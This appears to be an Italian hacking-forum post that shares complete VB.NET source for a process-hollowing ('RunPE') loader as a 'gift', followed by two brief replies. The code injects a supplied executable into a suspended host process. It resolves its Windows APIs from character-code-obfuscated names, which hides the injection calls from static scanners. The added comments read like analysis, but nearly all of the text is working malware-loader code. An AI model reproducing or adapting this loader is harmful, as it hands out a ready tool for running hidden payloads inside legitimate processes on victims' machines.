Codice:
Imports System.Runtime.InteropServices
Imports System.Text
' Process-hollowing ("RunPE") loader, MITRE ATT&CK T1055.012: starts a host process suspended,
' replaces its mapped image with a PE supplied as a byte array, then resumes the main thread.
' Analyst notes:
'  - Only LoadLibraryA and GetProcAddress are declared as P/Invoke. Every other API is resolved at
'    run time from names assembled with ChrW(), so the injection APIs do not appear in the
'    assembly's P/Invoke metadata or as string literals.
'  - The PE offsets, the ToInt32 pointer arithmetic and the thread-context indices used in R
'    assume a 32-bit payload and a 32-bit target process.
'  - Behavioural sequence visible in R, all aimed at one child process:
'    CreateProcessA(suspended) -> GetThreadContext -> ReadProcessMemory -> NtUnmapViewOfSection ->
'    VirtualAllocEx(RWX) -> WriteProcessMemory -> SetThreadContext -> ResumeThread.
Public Class IX
' Static import used only to obtain module handles for the run-time resolver CreateAPI.
<DllImport("kernel32.dll", CharSet := CharSet.Auto, SetLastError := True)> _
Friend Shared Function LoadLibraryA(<[In], MarshalAs(UnmanagedType.LPStr)> lpFileName As String) As IntPtr
End Function
' Second static import; together with LoadLibraryA it is the only native API named in metadata.
Private Declare Ansi Function GetProcAddress Lib "kernel32" (hModule As IntPtr, procName As String) As IntPtr
' Delegate bound to CreateProcessA in R. The startup-info and process-info arguments are passed
' as raw Byte()/IntPtr() arrays rather than as declared structures.
Private Delegate Function ESS(appName As String, commandLine As StringBuilder, procAttr As IntPtr, thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> inherit As Boolean, creation As Integer, _
env As IntPtr, curDir As String, sInfo As Byte(), pInfo As IntPtr()) As Boolean
' Bound to GetThreadContext in R; the context is handled as a flat UInteger array.
Private Delegate Function EXT(hThr As IntPtr, ctxt As UInteger()) As Boolean
' Bound to SetThreadContext in R.
Private Delegate Function TEX(t As IntPtr, c As UInteger()) As Boolean
' The three delegates above (ESS, EXT, TEX) are resolved from kernel32.
' Bound to NtUnmapViewOfSection in R.
Private Delegate Function ION(hProc As IntPtr, baseAddr As IntPtr) As UInteger
' The delegate above (ION) is resolved from ntdll.
' Bound to ReadProcessMemory in R; the output buffer is a single ByRef IntPtr.
Private Delegate Function ORY(hProc As IntPtr, baseAddr As IntPtr, ByRef bufr As IntPtr, bufrSize As Integer, ByRef numRead As IntPtr) As Boolean
' Bound to ResumeThread in R.
Private Delegate Function EAD(hThread As IntPtr) As UInteger
' The two delegates above (ORY, EAD) are resolved from kernel32.
' Bound to VirtualAllocEx in R.
Private Delegate Function CEX(hProc As IntPtr, addr As IntPtr, size As IntPtr, allocType As Integer, prot As Integer) As IntPtr
' Bound to VirtualProtectEx in R (resolved there but never invoked in the visible code).
Private Delegate Function CTEX(hProcess As IntPtr, lpAddress As IntPtr, dwSize As IntPtr, flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
' Bound to WriteProcessMemory in R.
Private Delegate Function MOR(hProcess As IntPtr, lpBaseAddress As IntPtr, lpBuffer As Byte(), nSize As UInteger, ByRef lpNumberOfBytesWritten As Integer) As Boolean
' The three delegates above (CEX, CTEX, MOR) are resolved from kernel32.
' Same shape as R; AA uses it to call R indirectly.
Private Delegate Function OP(bytes As Byte(), surrogateProcess As String) As Boolean
' Run-time API resolver: LoadLibraryA(name) + GetProcAddress(method), wrapped as a delegate of type T.
' Neither return value is checked before it is passed on. For static triage, the combination of
' these two imports with Marshal.GetDelegateForFunctionPointer is the visible indicator.
Public Function CreateAPI(Of T)(name As String, method As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
End Function
' Public entry point: creates an IX instance and invokes R through an OP delegate.
' bytes            - the PE image to place into the child process.
' surrogateProcess - command line used to start the host (hollowed) process.
' Returns whatever R returns.
Public Shared Function AA(bytes As Byte(), surrogateProcess As String) As Boolean
Dim p As New IX()
Dim F1 As New OP(AddressOf p.R)
Dim Res As Boolean = F1(bytes, surrogateProcess)
Return Res
End Function
' Performs the hollowing. Returns False only when an exception is caught; every other path,
' including a failed CreateProcessA or failed memory writes, falls through to Return True.
Public Function R(bytes As Byte(), surrogateProcess As String) As Boolean
' The ChrW() sequences decode to "kernel32" and "ntdll".
Dim K32 As [String] = Convert.ToString(ChrW(107)) & ChrW(101) & ChrW(114) & ChrW(110) & ChrW(101) & ChrW(108) & ChrW(51) & ChrW(50)
Dim NTD As [String] = Convert.ToString(ChrW(110)) & ChrW(116) & ChrW(100) & ChrW(108) & ChrW(108)
' Decodes to "CreateProcessA".
Dim CP As ESS = CreateAPI(Of ESS)(K32, Convert.ToString(ChrW(67)) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(116) & ChrW(101) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(65))
' Decodes to "NtUnmapViewOfSection" (the only function taken from ntdll).
Dim NUVS As ION = CreateAPI(Of ION)(NTD, Convert.ToString(ChrW(78)) & ChrW(116) & ChrW(85) & ChrW(110) & ChrW(109) & ChrW(97) & ChrW(112) & ChrW(86) & ChrW(105) & ChrW(101) & ChrW(119) & ChrW(79) & ChrW(102) & ChrW(83) & ChrW(101) & ChrW(99) & ChrW(116) & ChrW(105) & ChrW(111) & ChrW(110))
' Decodes to "GetThreadContext".
Dim GTC As EXT = CreateAPI(Of EXT)(K32, Convert.ToString(ChrW(71)) & ChrW(101) & ChrW(116) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(67) & ChrW(111) & ChrW(110) & ChrW(116) & ChrW(101) & ChrW(120) & ChrW(116))
' Decodes to "SetThreadContext".
Dim STC As TEX = CreateAPI(Of TEX)(K32, Convert.ToString(ChrW(83)) & ChrW(101) & ChrW(116) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(67) & ChrW(111) & ChrW(110) & ChrW(116) & ChrW(101) & ChrW(120) & ChrW(116))
' Decodes to "ReadProcessMemory".
Dim RPM As ORY = CreateAPI(Of ORY)(K32, Convert.ToString(ChrW(82)) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(77) & ChrW(101) & ChrW(109) & ChrW(111) & ChrW(114) & ChrW(121))
' Decodes to "ResumeThread".
Dim RT As EAD = CreateAPI(Of EAD)(K32, Convert.ToString(ChrW(82)) & ChrW(101) & ChrW(115) & ChrW(117) & ChrW(109) & ChrW(101) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100))
' Decodes to "VirtualAllocEx".
Dim VAE As CEX = CreateAPI(Of CEX)(K32, Convert.ToString(ChrW(86)) & ChrW(105) & ChrW(114) & ChrW(116) & ChrW(117) & ChrW(97) & ChrW(108) & ChrW(65) & ChrW(108) & ChrW(108) & ChrW(111) & ChrW(99) & ChrW(69) & ChrW(120))
' Decodes to "VirtualProtectEx"; VPE is not called anywhere below.
Dim VPE As CTEX = CreateAPI(Of CTEX)(K32, Convert.ToString(ChrW(86)) & ChrW(105) & ChrW(114) & ChrW(116) & ChrW(117) & ChrW(97) & ChrW(108) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(116) & ChrW(101) & ChrW(99) & ChrW(116) & ChrW(69) & ChrW(120))
' Decodes to "WriteProcessMemory".
Dim WPM As MOR = CreateAPI(Of MOR)(K32, Convert.ToString(ChrW(87)) & ChrW(114) & ChrW(105) & ChrW(116) & ChrW(101) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(77) & ChrW(101) & ChrW(109) & ChrW(111) & ChrW(114) & ChrW(121))
Try
Dim procAttr As IntPtr = IntPtr.Zero
' Four-slot array standing in for PROCESS_INFORMATION: slot 0 is used below as the process
' handle and slot 1 as the thread handle.
Dim processInfo As IntPtr() = New IntPtr(3) {}
' Zero-filled 68-byte buffer passed where STARTUPINFO is expected.
Dim startupInfo As Byte() = New Byte(67) {}
' PE header fields read straight from the payload with no bounds or signature validation:
' num2 = e_lfanew (offset 60), num = NumberOfSections, ptr4 = SizeOfHeaders (PE32 layout).
Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
' Creation flag 4 is CREATE_SUSPENDED: the host process starts with its main thread frozen.
If CP(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
procAttr, Nothing, startupInfo, processInfo) Then
' 179 DWORDs hold the x86 CONTEXT; &H10002 requests the integer registers.
Dim ctxt As UInteger() = New UInteger(178) {}
ctxt(0) = &H10002
If GTC(processInfo(1), ctxt) Then
' Index &H29 is Ebx in the x86 CONTEXT layout; for a freshly created suspended thread it is
' expected to hold the PEB address, so +8 is the PEB's image-base field.
Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
Dim buffer__1 As IntPtr = IntPtr.Zero
Dim bufferSize As New IntPtr(4)
Dim numRead As IntPtr = IntPtr.Zero
' Read the host's current image base (4 bytes) and unmap that image from the child.
If RPM(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NUVS(processInfo(0), buffer__1) = 0) Then
' addr = payload ImageBase, size = payload SizeOfImage.
Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE. The whole image stays
' RWX because VirtualProtectEx is never called; the result is not checked for failure.
Dim lpBaseAddress As IntPtr = VAE(processInfo(0), addr, size, &H3000, &H40)
Dim lpNumberOfBytesWritten As Integer
' Copy the PE headers (SizeOfHeaders bytes) into the child; return value ignored.
WPM(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
Dim num5 As Integer = num - 1
' Copy each section: the 40-byte section headers start at num2 + &HF8 (PE32 layout).
For i As Integer = 0 To num5
' dst holds one section header as ten Int32s: dst(3) = VirtualAddress,
' dst(4) = SizeOfRawData, dst(5) = PointerToRawData.
Dim dst As Integer() = New Integer(9) {}
Buffer.BlockCopy(bytes, (num2 + &Hf8) + (i * 40), dst, 0, 40)
Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
' Convert.ToInt32(Nothing, 2) presumably evaluates to 0, i.e. an obscured literal destination offset.
Buffer.BlockCopy(bytes, dst(5), buffer2, Convert.ToInt32(Nothing, 2), buffer2.Length)
' size and addr are reused here as "remote destination" and "byte count".
size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
addr = New IntPtr(buffer2.Length)
WPM(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
Next
' Overwrite the image-base field in the child's PEB with the new allocation address.
size = New IntPtr(ctxt(&H29) + 8L)
addr = New IntPtr(4)
WPM(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
' Index &H2c is Eax in the x86 CONTEXT layout; it is set to new base + AddressOfEntryPoint so
' the resumed thread starts in the payload.
ctxt(&H2c) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
STC(processInfo(1), ctxt)
End If
End If
' The thread is resumed whenever CreateProcessA succeeded, even if the steps above were skipped
' or failed. The process and thread handles are not closed anywhere in this function.
RT(processInfo(1))
End If
Catch
' Every exception is swallowed with no logging; the caller only sees False.
Return False
End Try
Return True
End Function
End Class
Crediti: Sikander
Soltanto un regalino, dato che fra 5 ore parto.
funziona allo stesso modo?
come trolli tu non trolla nessuno 